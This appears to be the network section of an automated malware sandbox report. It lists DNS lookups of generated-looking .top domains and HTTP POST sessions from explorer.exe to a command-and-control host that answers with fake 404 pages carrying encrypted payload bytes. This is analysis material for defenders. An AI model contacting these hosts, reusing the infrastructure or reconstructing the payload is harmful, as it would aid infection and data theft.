                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.195302010 CEST8.8.8.8192.168.2.60x1917Name error (3)naghenrietti1.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.326502085 CEST8.8.8.8192.168.2.60x205eName error (3)kimballiett2.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.465382099 CEST8.8.8.8192.168.2.60x1183Name error (3)xadriettany3.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.513314962 CEST8.8.8.8192.168.2.60x1eName error (3)jebeccallis4.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.626837969 CEST8.8.8.8192.168.2.60x1e4eName error (3)nityanneron5.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.870421886 CEST8.8.8.8192.168.2.60x9de7Server failure (2)umayaniela6.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.191394091 CEST8.8.8.8192.168.2.60x30b5Name error (3)lynettaram7.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.246506929 CEST8.8.8.8192.168.2.60x9de7Server failure (2)umayaniela6.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.385461092 CEST8.8.8.8192.168.2.60x1df1Name error (3)sadineyalas8.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.220540047 CEST8.8.8.8192.168.2.60x55dcNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.963875055 CEST8.8.8.8192.168.2.60x106No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.201778889 CEST8.8.8.8192.168.2.60x9de7Server failure (2)umayaniela6.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.591423988 CEST8.8.8.8192.168.2.60x7f59No error (0)privacy-toolz-for-you-403.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.831391096 CEST8.8.8.8192.168.2.60xc52fNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.457231045 CEST8.8.8.8192.168.2.60x1505No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.582813025 CEST8.8.8.8192.168.2.60x1105No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.835047007 CEST8.8.8.8192.168.2.60xd0a4No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.405194044 CEST8.8.8.8192.168.2.60xdeecNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.723232985 CEST8.8.8.8192.168.2.60x2827No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.057070017 CEST8.8.8.8192.168.2.60x14bbNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.195090055 CEST8.8.8.8192.168.2.60x2d9aNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.531582117 CEST8.8.8.8192.168.2.60x9ed4No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:43.740174055 CEST8.8.8.8192.168.2.60x53e2No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.088499069 CEST8.8.8.8192.168.2.60xe720No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.439909935 CEST8.8.8.8192.168.2.60x7461No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.903294086 CEST8.8.8.8192.168.2.60xcdecNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.165852070 CEST8.8.8.8192.168.2.60x11b2No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.821141958 CEST8.8.8.8192.168.2.60xf8a0No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.091289043 CEST8.8.8.8192.168.2.60xa452No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.338222980 CEST8.8.8.8192.168.2.60xeb48No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.661124945 CEST8.8.8.8192.168.2.60x7644No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:47.002038002 CEST8.8.8.8192.168.2.60xd8e1No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:48.725550890 CEST8.8.8.8192.168.2.60x15baNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.259675026 CEST8.8.8.8192.168.2.60x7ba1No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.531271935 CEST8.8.8.8192.168.2.60x8187No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.187031031 CEST8.8.8.8192.168.2.60x94edNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.574778080 CEST8.8.8.8192.168.2.60xeed5No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.766330004 CEST8.8.8.8192.168.2.60x2f8cNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.012435913 CEST8.8.8.8192.168.2.60x44aeNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.368376970 CEST8.8.8.8192.168.2.60xc836No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:07.529788971 CEST8.8.8.8192.168.2.60xae09No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.019428968 CEST8.8.8.8192.168.2.60x12d9No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.422373056 CEST8.8.8.8192.168.2.60x7492No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.440402031 CEST8.8.8.8192.168.2.60x189bNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.898325920 CEST8.8.8.8192.168.2.60xa828No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.258060932 CEST8.8.8.8192.168.2.60x4960No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.507046938 CEST8.8.8.8192.168.2.60xe9f8No error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.373219013 CEST8.8.8.8192.168.2.60x75aeNo error (0)geenaldencia9.top194.147.85.186A (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.012115955 CEST8.8.8.8192.168.2.60xb34eNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.045906067 CEST8.8.8.8192.168.2.60xf975No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.180354118 CEST8.8.8.8192.168.2.60x5775No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.212959051 CEST8.8.8.8192.168.2.60x4880No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.249732018 CEST8.8.8.8192.168.2.60x1176No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.290045977 CEST8.8.8.8192.168.2.60x9c58No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.331665039 CEST8.8.8.8192.168.2.60xd2d8No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.444024086 CEST8.8.8.8192.168.2.60xf57fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:49.643933058 CEST8.8.8.8192.168.2.60xe8fdNo error (0)defeatwax.ru193.56.146.188A (IP address)IN (0x0001)

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                  • geenaldencia9.top
                                                                                                                                                                                                  • privacy-toolz-for-you-403.top
                                                                                                                                                                                                  • 193.56.146.41:9080
                                                                                                                                                                                                  • 194.180.174.100

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.649837149.154.167.99443
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  1192.168.2.649767194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.312551022 CEST1413OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 354
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.468553066 CEST1414INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:18 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 25
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 14 00 00 00 7b fa f1 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00
                                                                                                                                                                                                  Data Ascii: {i+,GO


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  10192.168.2.649788194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.118969917 CEST5385OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 252
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.273689032 CEST5388INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:30 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 44
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89
                                                                                                                                                                                                  Data Ascii: I:82OI:@_MqBJK,


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  11192.168.2.649800194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.251802921 CEST5463OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 118
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.407788992 CEST5463INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:38 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  12192.168.2.649801194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.595668077 CEST5465OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 307
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.769793034 CEST5973INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:38 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 33 34 62 61 62 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 af 7c 61 4c c2 42 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 f1 9b 87 cd d1 85 78 51 a1 a2 8f bc 79 d6 1c e0 32 02 50 08 48 db e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 b9 20 59 53 11 5c 5e c2 52 ab 48 11 80 cd 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 23 59 c2 8a 43 d8 06 0e 45 27 28 7d 3c cc e0 04 89 f9 d4 57 80 90 70 89 ec 66 7e 6b 06 ca a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 9e 70 9f 8a 86 e8 47 5a ad b2 cb 99 64 51 11 87 4a b1 b8 56 b0 40 f6 0a bf 8b 71 91 c0 75 f0 46 01 ff 56 59 27 04 5b 96 da 19 d1 3a 2d d8 42 06 02 23 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 40 d7 d8 03 f3 1e 7b d3 c1 44 4f 04 38 6d 7c 14 2c 64 e8 b1 14 f1 70 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 5a 50 bc a2 b7 f1 f6 6a 1f a7 e9 4d 51 e2 48 64 cd 25 5c 8d b7 97 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a4 ed e1 5a fc 37 bc 17 fe 2f 63 9e f8 d8 22 4e 42 25 e3 b5 be 34 60 99 46 3e 99 86 11 02 83 37 42 c2 1a ce ae 30 4b 95 f6 ab 26 24 02 18 70 fb e8 f6 9c 81 de bb 0e 63 36 cf 03 27 4e e2 ea bc 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 6f bd 44 af 91 ff 27 b9 87 f9 5d 63 97 ab 96 57 25 75 b1 d0 ea 85 50 4a 08 3f 56 7a 98 6c 39 c0 5e f3 5c 19 6e 63 95 be 67 3d da 7a 77 6b 56 18 8a 92 2b 0f e9 1c 31 eb cd 7c 1e 15 8e b9 82 7f 8e 02 82 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af fd c6 83 21 49 42 dd ca 8b 21 10 a0 04 5f 61 87 bd d7 51 67 09 3d 8a ef 22 6b 5f 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 40 2c 0f 3a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 09 64 40 a6 9c c1 0c 54 4d 06 ce aa 4c dc a4 a9 3f f0 b1 68 42 bb ca fa be 60 f6 54 e6 26 56 aa 60 f0 89 b4 10 32 c9 e5 22 1b 9c 65 6a a5 ef 61 51 4b
                                                                                                                                                                                                  Data Ascii: 34bab2S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|aLB+%gtxQy2PH0YObyT=a'4! YS\^RHXKg[Ge92)g z6#YCE'(}<Wpf~k"H2I?o|6NI[LeU[0z;+W~5=PVpGZdQJV@quFVY'[:-B#GkKm@@{DO8m|,dp"JG0Z"?kQZPjMQHd%\!&Q#F<pvAZ7/c"NB%4`F>7B0K&$pc6'NGc_,oD']cW%uPJ?Vzl9^\ncg=zwkV+1|N!{K.iw!IB!_aQg="k_zR{}@,:HB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59d@TML?hB`T&V`2"ejaQK


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  13192.168.2.649807194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:43.806826115 CEST13442OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 269
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:43.978375912 CEST13443INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:43 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  14192.168.2.649808194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.147234917 CEST13444OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 173
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.395401955 CEST13444INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:44 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  15192.168.2.649810194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.499569893 CEST13445OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
